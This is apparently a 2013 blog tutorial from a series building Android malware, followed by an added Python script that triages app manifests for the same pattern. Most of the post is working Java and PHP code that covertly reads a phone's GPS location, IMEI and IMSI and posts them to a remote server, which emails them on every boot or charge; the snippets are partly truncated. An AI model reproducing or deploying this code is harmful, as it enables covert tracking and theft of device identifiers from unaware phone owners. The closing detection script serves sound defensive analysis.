May 06, 2013

Let’s see if we can get the device location, because it’s neat on mobile devices. I don’t know if it is SO important, but we can do it, so let’s do it:

We have several ways to get the location: the least accurate is GSM cell localization, then WiFi networks, and then GPS, which is very accurate. We will iterate over all available location providers to choose the most accurate one and return the location as double[] (typical GPS coordinates). Let’s add this code to the class DeviceLocation:

public double[] getGPS(Activity a) {
    try {
      LocationManager lm = (LocationManager) a.getSystemService(Context.LOCATION_SERVICE);
      List<String> providers = lm.getProviders(true);

      /* Loop over the list backwards, and if you get a location, then break out of the loop */
      Location l = null;

      for (int i = providers.size() - 1; i >= 0; i--) {
        l = lm.getLastKnownLocation(providers.get(i));
        if (l != null) break;
      }

      double[] gps = new double[2];
      if (l != null) {
        gps[0] = l.getLatitude();
        gps[1] = l.getLongitude();
      }
      return gps;
    } catch (Exception e) {
      // I don't even know how this might happen
      return null;
    }
}

As you can see, we either get null or latitude and longitude as an array. Easy, isn’t it?

Edit: I forgot to say that we have to add permissions for this. I hope you made it up yourself ;) We need fine and coarse location, since we try all location providers:

[Screenshot: AndroidManifest of the Malware1 project]

In order to receive the location data on our server, we extend the PHP file to something like this:

$data = "Location:\r\n";
$data = $data . "lat: " . $_POST["lat"] . "\r\n";
$data = $data . "long: " . $_POST["long"] . "\r\n";
$data = $data . "" . $_POST["lat"] . "," . $_POST["long"] . "\r\n";
$data = $data . "\r\n\r\n";
$data = $data . "Device Information:\r\n";
$data = $data . "IMEI: " . $_POST["imei"] . "\r\n";
$data = $data . "IMSI: " . $_POST["imsi"] . "\r\n";

mail("", "Pingback from Android device", "le data:\r\n".$data);

Further we change the WebHelper usage in and
try {
      DeviceLocation d = new DeviceLocation();
      double[] location = d.getGPS(this);

      WebHelper w = new WebHelper("",
    catch (Exception e) {
      Log.e("malware", e.toString());

(Of course we use arg0 instead of this in

And we change the to include latitude and longitude data:

public class WebHelper extends Thread {
  private String url="";
  private String imei="";
  private String imsi="";
  private Double lat=0.0;
  private Double longi=0.0;
  public WebHelper(String u, String imei, String imsi, Double lat, Double longi) {
  public void run() {
    SendToWebserver(url, imei, imsi, lat, longi);

  @SuppressWarnings({ "rawtypes", "unchecked" })
  public String SendToWebserver(String url, String imei, String imsi, Double lat, Double longi) {
    HttpClient httpclient = new DefaultHttpClient();
    HttpPost httppost = new HttpPost(url);

    try {
      // Add your data
      List nameValuePairs = new ArrayList(2);
      nameValuePairs.add(new BasicNameValuePair("imei", imei));
      nameValuePairs.add(new BasicNameValuePair("imsi", imsi));
      nameValuePairs.add(new BasicNameValuePair("lat", lat.toString()));
      nameValuePairs.add(new BasicNameValuePair("long", longi.toString()));
      // add others like this
      // nameValuePairs.add(new BasicNameValuePair("sim_id", sim_id));

      httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));

      // Execute HTTP Post Request
      HttpResponse response = httpclient.execute(httppost);

      return response.toString();

    } catch (Exception e) {
      return e.toString();

Whenever the device is charging or booting, we will now receive an email along the lines of this:

[Screenshot: webmail showing the “Pingback from Android device” email]
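Seen from the analyst's side, the permissions added above and the charging/boot trigger leave a recognisable footprint in a decoded AndroidManifest.xml. The following triage check is an added example, not code from the original post; the sample manifests, package name and receiver name are constructed, and the INTERNET, READ_PHONE_STATE and boot/power receiver entries are assumptions inferred from the text rather than shown on the page.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."
LOCATION = {P + "ACCESS_FINE_LOCATION", P + "ACCESS_COARSE_LOCATION"}
IDENTIFIERS = {P + "READ_PHONE_STATE"}  # required to read IMEI / IMSI
NETWORK = {P + "INTERNET"}
TRIGGERS = {"android.intent.action.BOOT_COMPLETED",
            "android.intent.action.ACTION_POWER_CONNECTED"}

def triage_manifest(xml_text):
    """Report location/identifier access combined with network and boot/power receivers."""
    root = ET.fromstring(xml_text)
    perms = {e.get(ANDROID + "name") for e in root.iter("uses-permission")}
    receivers = {}
    for rec in root.iter("receiver"):
        actions = [a.get(ANDROID + "name") for a in rec.iter("action")]
        hits = [a for a in actions if a in TRIGGERS]
        if hits:
            receivers[rec.get(ANDROID + "name")] = hits
    report = {
        "location": sorted(perms & LOCATION),
        "identifiers": sorted(perms & IDENTIFIERS),
        "network": sorted(perms & NETWORK),
        "receivers": receivers,
    }
    # One permission alone is common; flag only sensitive data + network + a
    # trigger that runs without the user opening the app.
    sensitive = report["location"] or report["identifiers"]
    report["suspicious"] = bool(sensitive and report["network"] and receivers)
    return report

def _manifest(perms, receiver_xml=""):
    # Builds a constructed sample manifest (package and class names are made up).
    uses = "".join('<uses-permission android:name="%s%s"/>' % (P, p) for p in perms)
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            'package="com.example.sample">%s<application>%s</application></manifest>'
            % (uses, receiver_xml))

SAMPLE_FLAGGED = _manifest(
    ["ACCESS_FINE_LOCATION", "ACCESS_COARSE_LOCATION", "READ_PHONE_STATE",
     "INTERNET", "RECEIVE_BOOT_COMPLETED"],
    '<receiver android:name=".PowerReceiver"><intent-filter>'
    '<action android:name="android.intent.action.BOOT_COMPLETED"/>'
    '<action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>'
    '</intent-filter></receiver>')
SAMPLE_BENIGN = _manifest(["ACCESS_FINE_LOCATION", "INTERNET"])  # e.g. a map app

if __name__ == "__main__":
    for label, text in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(label, triage_manifest(text))
```

The check deliberately ignores single permissions, since location plus network access is normal for many apps; it is the combination with an unattended boot or power trigger that merits a closer look at the receiver class.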